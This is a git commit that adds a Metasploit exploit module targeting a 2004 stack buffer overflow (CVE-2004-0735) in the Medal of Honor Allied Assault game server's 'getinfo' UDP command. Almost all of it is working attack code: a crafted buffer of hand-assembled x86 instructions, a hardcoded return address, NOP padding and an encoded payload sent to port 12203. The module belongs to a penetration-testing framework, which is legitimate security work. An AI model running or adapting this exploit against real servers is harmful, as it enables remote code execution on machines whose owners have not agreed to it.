Added Medal of Honor module from Jacopo Cervini.

git-svn-id: file:///home/svn/framework3/trunk@5721 4d416f70-5f16-0410-b530-b9f4589650da
2008-10-07 12:03:12 +00:00 · 2008-10-07 12:03:12 +00:00 · 7d85b1d198
parent 35240108de
commit 7d85b1d198
1 changed files with 96 additions and 0 deletions
--- a/modules/exploits/windows/games/mohaa_getinfo.rb
+++ b/modules/exploits/windows/games/mohaa_getinfo.rb
@ -0,0 +1,96 @@
+##
+# $Id$
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to 
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Exploit::Remote
+
+	include Msf::Exploit::Remote::Udp
+
+	def initialize(info = {})
+		super(update_info(info,	
+			'Name'           => 'Medal Of Honor Allied Assault getinfo Stack Overflow',
+			'Description'    => %q{
+							This module exploits a stack based buffer overflow in the getinfo
+							command of Medal Of Honor Allied Assault.
+			},
+			'Author'         => [ 'Jacopo Cervini' ],
+			'License'        => BSD_LICENSE,
+			'Version'        => '$Revision$',
+			'References'     =>
+				[
+					[ 'CVE', '2004-0735'],
+					[ 'URL', 'http://www.milw0rm.com/exploits/357'],
+					[ 'BID', '10743'],
+					[ 'OSVDB', '8061' ],
+				],
+			'Privileged'     => false,
+			'Payload'        =>
+				{
+					'Space'    => 512,
+					'BadChars' => "\x00",
+				},
+			'Platform'       => 'win',
+			'Targets'        => 
+				[
+					['Medal Of Honor Allied Assault v 1.0 Universal', { 'Rets' => [ 111, 0x406957 ] }], # call ebx
+				],
+			'DisclosureDate' => 'Jul 17 2004',
+			'DefaultTarget' => 0))
+
+			register_options(
+				[
+					Opt::RPORT(12203)
+				], self.class)
+	end
+
+	def exploit
+		connect_udp
+
+		# We should convert this to metasm - Patrick
+		buf = 'B' * target['Rets'][0]
+		buf << "\x68\x76\x76\x76\x76"*9   	# PUSH 76767676 x 9
+		buf << "\x68\x7f\x7f\x7f\x7f"     	# PUSH 7F7F7F7F
+		buf << "\x57"			    	# PUSH EDI
+		buf << "\x58"			    	# POP EAX
+		buf << "\x32\x64\x24\x24"	    	# XOR AH,BYTE PTR SS:[ESP+24]
+		buf << "\x32\x24\x24"		    	# XOR AH,BYTE PTR SS:[ESP]
+		buf << "\x48"*150			    	# DEC EAX x 150
+		buf << "\x50\x50"			    	# PUSH EAX x 2
+		buf << "\x53"				# PUSH EBX
+		buf << "\x58"				# POP EAX
+		buf << "\x51"				# PUSH ECX
+		buf << "\x32\x24\x24"			# XOR AH,BYTE PTR SS:[ESP]
+		buf << "\x6a\x7f"				# PUSH 7F
+		buf << "\x5e"				# POP ESI
+		buf << "\x46"*37				# INC ESI
+		buf << "\x56"*10				# PUSH ESI
+		buf << "\x32\x44\x24\x24"		# XOR AL,BYTE PTR SS:[ESP+24]
+		buf << "\x49\x49"				# DEC ECX
+		buf << "\x31\x48\x34"			# XOR DWORD PTR DS:[EAX+34],ECX
+		buf << "\x58"*11				# POP EAX	
+		buf << "\x42"*66
+		buf << "\x3c"*4
+		buf << "\x42"*48
+		buf << [ target['Rets'][1] ].pack('V')
+
+		req = "\xff\xff\xff\xff\x02" + "getinfo " + buf
+		req << "\r\n\r\n" + make_nops(32) + payload.encoded
+
+		udp_sock.put(req)	
+
+		handler
+		disconnect_udp
+	end
+
+end